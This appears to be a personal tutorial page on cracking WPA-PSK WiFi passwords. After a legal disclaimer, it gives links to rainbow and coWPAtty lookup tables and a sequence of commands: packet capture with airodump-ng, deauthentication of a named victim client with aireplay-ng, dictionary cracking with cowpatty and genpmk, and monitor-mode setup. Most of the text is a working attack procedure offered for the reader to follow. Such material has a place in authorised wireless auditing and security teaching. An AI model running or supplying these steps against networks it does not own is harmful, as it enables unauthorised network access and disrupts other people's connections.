NOTE: This page is for educational purposes only! In fact, it's for PRIVATE educational purposes only. It is not intended for public consumption. Unless these procedures are performed on either A) equipment that you 100% own and control (both AP and client side) or B) you are a professional wireless security auditor with the appropriate liability waivers in place and a good working knowledge of all applicable laws, it is a BAD idea for you to duplicate any of this as you may be in violation of the law.
that being said…
First things first, fire up bit torrent and either head over to Church of WiFi and grab the WPA-PSK and coWPAtty tables, or get them from the mirrored links below:
Church of Wifi WPA-PSK Rainbow Tables torrent (7gig)
Church of Wifi Uber coWPAtty lookup tables (34 gig)
Start downloading… it'll take a while!
RECON:
- Scope out your target. Fire up kismet (or iwlist) to determine what channel and SSID your target is using
- Start capturing packets: airodump-ng –channel 11 -w capture.log ath1
- While capturing, pick a client and deauth them a couple of times: (see below)
- ./cowpatty -r capture-log.cap -d linksys.hash linksys
- Nuts, the download isn't done… that's where we'd get the linksys.hash file.
- /tmp/genpmk -f /media/disk/dictionaries/all/ALL.txt -d /media/disk/SSID_r3a11yS3cur3_ALL.txt_hash -s r3a11yS3cur3
Deauthing
- aireplay-ng –deauth 1 -a 00:0F:B5:38:BA:20 -c 00:17:3F:17:9E:E2 ath1
- where the -a mac is the mac of the AP, and the -c mac is the mac of the target/victim wifi client
Monitor Mode
- on ATTACK box, create a monitor interface “wlanconfig ath1 create wlandev wifi0 wlanmode monitor” and then “ifconfig ath1 up” (assuming that ath1 is the monitoring interface that was just created)
- run 'ifconfig ath0 up; iwconfig ath0 mode Monitor channel <#>'
————-
